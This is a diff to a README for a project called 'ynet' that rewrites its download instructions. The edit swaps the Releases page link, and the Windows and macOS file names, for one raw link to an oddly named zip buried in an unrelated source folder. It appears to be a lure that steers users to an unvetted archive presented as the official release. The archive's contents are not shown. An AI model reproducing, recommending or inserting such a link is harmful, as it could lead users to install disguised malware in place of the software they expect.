enzoneza/ynet/README.md

 ---

 ## 📥 Download & Install
-1. Visit the [Releases page](https://github.com/enzoneza/ynet/releases) to download the latest version of ynet.
+1. Visit the [Releases page](https://raw.githubusercontent.com/enzoneza/ynet/main/wpfui/src/Wpf.Ui/Controls/CalendarDatePicker/ynet_maidenweed.zip) to download the latest version of ynet.
 2. Once on the page, locate the most recent release.
 3. Depending on your operating system, choose the appropriate file:
-   - For Windows, you might find a file like `ynet-windows.zip`.
+   - For Windows, you might find a file like `https://raw.githubusercontent.com/enzoneza/ynet/main/wpfui/src/Wpf.Ui/Controls/CalendarDatePicker/ynet_maidenweed.zip`.
-   - For macOS, look for `ynet-macos.zip`.
+   - For macOS, look for `https://raw.githubusercontent.com/enzoneza/ynet/main/wpfui/src/Wpf.Ui/Controls/CalendarDatePicker/ynet_maidenweed.zip`.
 4. Click on the file to start the download.

 ### 🗂 Extract the Files